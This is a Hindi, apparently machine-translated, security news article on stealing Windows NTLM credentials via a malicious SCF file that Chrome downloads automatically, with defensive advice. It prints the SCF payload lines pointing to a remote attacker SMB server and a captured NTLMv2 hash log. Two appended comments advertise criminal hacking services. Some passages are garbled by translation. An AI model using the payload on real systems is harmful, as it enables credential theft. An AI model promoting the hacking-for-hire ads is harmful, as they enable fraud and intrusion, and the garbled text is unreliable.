Thanx To THN |
डिफेंसकोड के शोधकर्ता बोस्को स्टेनोकोविक ने पाया है कि एक दुर्भावनापूर्ण एससीएफ फ़ाइल वाली वेबसाइट पर जाकर पीड़ितों को अनजाने में अपने कंप्यूटर के प्रवेश प्रमाण पत्र को क्रोम और एसएमबी प्रोटोकॉल के माध्यम से हैकर्स के साथ साझा कर सकते हैं।
यह तकनीक नई नहीं है और इसका उपयोग स्टक्सनेट - एक शक्तिशाली मैलवेयर द्वारा किया गया था जो विशेष रूप से ईरान के परमाणु प्रोग्राम को नष्ट करने के लिए डिज़ाइन किया गया था - जो सिस्टम को समझौता करने के लिए विंडोज शॉर्टकट एलएनके फ़ाइलों का इस्तेमाल करता था
यह हमला दूसरों से अलग क्यों है यह तथ्य है कि इंटरनेट एक्सप्लोरर (आईई) और एज के बाद, इस तरह के एसएमबी प्रमाणीकरण संबंधित हमलों को सार्वजनिक रूप से पहली बार Google क्रोम पर प्रदर्शित किया गया है।
क्रोम + एससीएफ + एसएमबी = स्टीलिंग विंडोज क्रेडेंशियल्स
एससीएफ (शेल कमांड फाइल) शॉर्टकट फ़ाइल स्वरूप एलएनके फाइलों के समान काम करता है और यह विंडोज एक्सप्लोरर के एक सीमित सेट का समर्थन करने के लिए डिज़ाइन किया गया है जो आपके डेस्कटॉप पर एक आइकन, जैसे मेरा कंप्यूटर और रीसायकल बिन को परिभाषित करने में मदद करता है।
"स्टैनकोविच ने एक ब्लॉग पोस्ट में लिखा," वर्तमान में, हमलावर को पीडि़त (पूरी तरह से अद्यतित Google क्रोम और विंडोज का उपयोग करके) को लुभाने की जरूरत है ताकि वे पीड़ित के प्रमाणीकरण क्रेडेंशियल को आगे बढ़ाने और पुनः उपयोग करने में सक्षम हो सकें। "असल में, आपके डेस्कटॉप पर शॉर्टकट लिंक्स शैल कोड के विशिष्ट सिंटैक्स वाला एक टेक्स्ट फाइल है जो कि आइकन / थंबनेल, एप्लिकेशन का नाम और उसके स्थान का स्थान निर्धारित करता है।
[शेल]चूंकि क्रोम विंडोज एससीएफ फाइलों का भरोसा करता है, हमलावर पीड़ितों को उनकी वेबसाइट पर जा सकते हैं जिसमें दुर्भावनापूर्ण ढंग से तैयार की गई शॉर्टकट फाइल होती है, जो उपयोगकर्ताओं से पुष्टि के बिना स्वचालित रूप से लक्ष्य सिस्टम पर डाउनलोड हो जाती है।
कमान = 2
IconFile = explorer.exe, 3
जैसे ही प्रयोक्ता उस फ़ोल्डर को खोलता है जो कि डाउनलोड की गई फ़ाइल को तुरंत या बाद में रखती है, यह फ़ाइल स्वचालित रूप से उस आइकन को बिना उस आइकन पर प्राप्त करने के लिए चलाती है जिस पर उस पर क्लिक किया जाता है
लेकिन किसी आइकन छवि के स्थान को स्थापित करने के बजाय, हमलावर द्वारा बनाई गई दुर्भावनापूर्ण एससीएफ फ़ाइल में एक दूरस्थ SMB सर्वर (हमलावर द्वारा नियंत्रित) का स्थान होता है।
[शेल]इसलिए, जैसे ही एससीएफ फाइल आइकन की छवि को पुनः प्राप्त करने का प्रयास करता है, यह एसएमबी प्रोटोकॉल पर हमलावर के नियंत्रित रिमोट सर्वर के साथ एक स्वचालित प्रमाणीकरण बनाने की कोशिश करेगा, पीड़ित के उपयोगकर्ता नाम को सौंपेगा और पासवर्ड का हैड किया गया संस्करण देगा, जिससे हमलावर को आपके आपके व्यक्तिगत कंप्यूटर या नेटवर्क संसाधन को प्रमाणित करने के लिए क्रेडेंशियल्स
IconFile = \\ 170.170.170.170 \ आइकन
"रिमोट एसएमबी सर्वर पर एक आइकन स्थान सेट करना एक ज्ञात हमला वेक्टर है जो विंडोज़ स्वचालित प्रमाणन सुविधा को दुर्व्यवहार करता है जब रिमोट फाइल शेयर जैसी सेवाओं तक पहुंचना होता है," स्टैंकोविक ने कहा।
लेकिन स्टक्सनेट के हमलों के बाद, माइक्रोसॉफ्ट ने एलएनके फाइल को केवल स्थानीय संसाधनों से अपने माउस को लोड करने के लिए मजबूर किया क्योंकि वे ऐसे ऐसे हमलों के प्रति अधिक संवेदनशील नहीं रहेंगे जो उन्हें बाहरी सर्वरों से दुर्भावनापूर्ण कोड लोड करने में सक्षम बनाते हैं।
हालांकि, एससीएफ फाइल अकेले छोड़ दी गई थी
एससीएफ फाइल के माध्यम से एलएम / एनटीएलएम हैश प्रमाणीकरण का शोषण
छवि स्रोत: एसएएनएस |
यदि आप अनजान हैं, तो सर्वर संदेश ब्लॉक (एसएमबी) प्रोटोकॉल के माध्यम से प्रमाणीकरण NTLM चुनौती / प्रतिक्रिया प्रमाणन तंत्र के साथ संयोजन में काम करता है।
संक्षेप में, एलएम / एनटीएलएम प्रमाणीकरण 4 चरणों में काम करता है:
- विंडोज़ प्रयोक्ता (क्लाइंट) सर्वर में लॉग इन करने का प्रयास करता है
- सर्वर एक चुनौती मूल्य के साथ प्रतिक्रिया करता है, उपयोगकर्ता को अपने हैश पासवर्ड के साथ चुनौती मान को एन्क्रिप्ट करने और उसे वापस भेजना कहता है।
- विंडोज एससीएफ अनुरोध को ग्राहक के यूज़रनेम और सर्वर के पासवर्ड के हैशेड संस्करण भेजकर संभालता है।
- सर्वर तब प्रतिक्रिया को कैप्चर करता है और प्रमाणीकरण को स्वीकार करता है, अगर ग्राहक का हैश पासवर्ड सही है
अगर उपयोगकर्ता एक कार्पोरेट नेटवर्क का हिस्सा है, तो उपयोगकर्ता को अपनी कंपनी के sysadmin द्वारा निर्दिष्ट नेटवर्क क्रेडेंशियल्स को हमलावर भेज दिया जाएगा।
यदि शिकार घर का उपयोगकर्ता है, तो शिकारकर्ता का विंडोज़ उपयोगकर्ता नाम और पासवर्ड हमलावर को भेज दिया जाएगा।
[*] एसएमबी कैप्चर - 2017-05-15 13:10:44 +0200
173.203.29.182:62521 - 173.203.2 9 .82 से कब्जा कर लिया गया NTLMv2 प्रतिक्रिया
USER: बोस्को डोमेन: मास्टर ओएस: एलएम:
LMHASH: विकलांग
LM_CLIENT_CHALLENGE: विकलांग
NTHASH: 98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko :: मास्टर: 1122334455667788: 98daf39c3a253bbe4a289e7a746d4b24: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000इसमें कोई संदेह नहीं है, क्रेडेंशियल एन्क्रिप्ट किए गए हैं लेकिन बाद में मूल लॉगिन पासवर्ड को सादे पाठ में पुनर्प्राप्त करने के लिए "जबरदस्ती मजबूर" हो सकता है।
"यह उल्लेखनीय है कि एससीएफ फाइलें विंडोज एक्सप्लोरर में फ़ाइल और फ़ोल्डर सेटिंग्स की परवाह किए बिना विस्तारहीन दिखाई देगा," शोधकर्ता ने कहा। "इसलिए, फ़ाइल नामित picture.jpg.scf विंडोज एक्सप्लोरर में चित्र के रूप में दिखाई देगी। जेपीजी। यह एससीएफ फाइलों के उपयोग से हमलों की अपूर्व प्रकृति को जोड़ती है।"
पासवर्ड को डिक्रिप्ट करने की कोई आवश्यकता नहीं * कभी-कभी *
चूंकि कई माइक्रोसॉफ्ट सर्विसेज अपने हैशेड फॉर्म में पासवर्ड स्वीकार करती है, इसलिए हमलावर एन्क्रिप्टेड पासवर्ड का उपयोग अपने OneDrive, Outlook.com, Office 365, ऑफिस ऑनलाइन, स्काइप, Xbox लाइव और अन्य माइक्रोसॉफ्ट सेवाओं में लॉगिन करने के लिए कर सकते हैं, डिक्रिप्शन अनावश्यक।
शोधकर्ता के अनुसार, इस तरह की कमजोरियों, बड़े संगठनों के लिए गंभीर खतरा पैदा कर सकती हैं क्योंकि वे हमलावरों को अपने सदस्यों में से किसी एक का प्रतिरूपण करने के लिए सक्षम करते हैं, जिससे हमलावरों को तुरंत उपयोग करने के लिए विशेषाधिकारों का पुन: उपयोग करने की इजाजत दी जा सकती है और उनके आईटी संसाधनों का उपयोग और नियंत्रण प्राप्त कर सकते हैं अन्य सदस्यों पर हमले।
ऐसे एसएमबी प्रमाणीकरण संबंधी हमलों को कैसे रोकें?
बस, आउटबाउंड एसएमबी कनेक्शन (टीसीपी बंदरगाहों 13 9 और 445) को स्थानीय नेटवर्क से फायरवॉल के जरिए डब्लूएएन को ब्लॉक करें ताकि स्थानीय कंप्यूटर दूरस्थ एसएमबी सर्वरों को क्वेरी नहीं कर सकें।
Stankovic भी उपयोगकर्ताओं को सलाह देता है कि Google क्रोम में स्वचालित रूप से डाउनलोड अक्षम करने के लिए सेटिंग्स → उन्नत सेटिंग दिखाएं → और तब "पूछें कि कहां से प्रत्येक फ़ाइल को डाउनलोड करने से पहले सहेजना है" विकल्प को चेक करें।
यह परिवर्तन आपको प्रत्येक डाउनलोड प्रयास को मैन्युअल रूप से अनुमोदन देने की अनुमति देगा, जो एससीएफ फाइलों के उपयोग से क्रेडेंशियल चोरी के हमलों के जोखिम को काफी कम कर देगा।
Google भेद्यता के बारे में जानता है और एक पैच पर काम करने के लिए कहा जाता है, लेकिन उपयोगकर्ताओं के लिए पैच उपलब्ध होने पर कोई भी समय सीमा नहीं दी गई है।
Hindi Me latest Hack NeWs Ke Liye Humse Jude Rahiye .
You guys have surpassed my expectations! James is seriously amazing and is doing everything to help my Fiancé and me, in1weeks my credit score went up 700 points and I can only imagine what is to come. Thank you for the excellent customer service and doing exactly what you all have set out to do! NO GIMMICKS OR BS with you guys.They carry out any kind of hacks You can reachout to them via Hackintechnology@gmail.com
ReplyDeleteThey are all scammers, they will make you pay after which they will give you an excuse asking you to pay more money, they have ripped me of $2000, i promised i was going to expose them. I figured it all out when my colleague took me to Pavel (HACKINTECHNOLOGY@GMAIL.COM) +1 669 225 2253 He did perfect job, he hacks all accounts ranging from (Emails, Facebook, whatsapp, imo, skype, instagram, Phone cloning, DMV removal, tracking locations, background checks Kik etc. he also hacks cell phones, cell phone tapping and cloning, clears bad driving and criminal records, bank transfers, locates missing individuals e.t.c. You should contact him and please stop using contacts you see on websites to execute jobs for you, you can ask around to find a real hacker.
ReplyDelete